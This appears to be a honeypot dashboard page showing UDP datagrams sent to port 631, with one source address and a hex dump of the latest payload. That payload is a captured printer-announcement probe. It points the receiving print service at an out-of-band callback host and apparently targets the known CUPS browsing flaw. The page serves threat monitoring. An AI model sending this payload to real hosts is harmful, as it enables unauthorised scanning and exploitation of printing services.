HoneyLabs

UDP traffic

Datagrams matching port:631 sent to HoneyLabs sensors over UDP in the last 7 days. DNS questions and QUIC client fingerprints are decoded on the sensor. Other datagrams are kept as their first bytes and labelled by protocol where it can be recognised.

A UDP source address can be forged, so each address listed here either sent the traffic or was impersonated by whoever did. UDP traffic is kept out of verdicts, feeds, watchlists and alerts.

Your plan searches up to 7d, so 30d was shortened. Plans

3

Datagrams

1

Source addresses

1

Networks

1

Countries

1

Destination ports

Traffic by type

Unrecognised

3 datagrams from 1 source

Datagrams no decoder recognised. Their first bytes are kept.

Latest Unrecognised datagram, to 631/udp

00 03 http://db3nrl5r4bong9uhslogbdox599zncot9.oast.live/printers/VulnPrinter "Office HQ" "Vulnerable Printer"

payload bytes
00000000  30 30 20 30 33 20 68 74  74 70 3a 2f 2f 64 62 33  |00 03 http://db3|
00000010  6e 72 6c 35 72 34 62 6f  6e 67 39 75 68 73 6c 6f  |nrl5r4bong9uhslo|
00000020  67 62 64 6f 78 35 39 39  7a 6e 63 6f 74 39 2e 6f  |gbdox599zncot9.o|
00000030  61 73 74 2e 6c 69 76 65  2f 70 72 69 6e 74 65 72  |ast.live/printer|
00000040  73 2f 56 75 6c 6e 50 72  69 6e 74 65 72 20 22 4f  |s/VulnPrinter "O|
00000050  66 66 69 63 65 20 48 51  22 20 22 56 75 6c 6e 65  |ffice HQ" "Vulne|
00000060  72 61 62 6c 65 20 50 72  69 6e 74 65 72 22        |rable Printer"|

Destination ports

Networks

Countries

Source addresses (unverified)

AddressNetworkCcSendsDatagramsLast seen (UTC)
93.123.109.214AS48090 Techoff Srv LimitedBGUnrecognised32026-10-08 14:37

Latest datagrams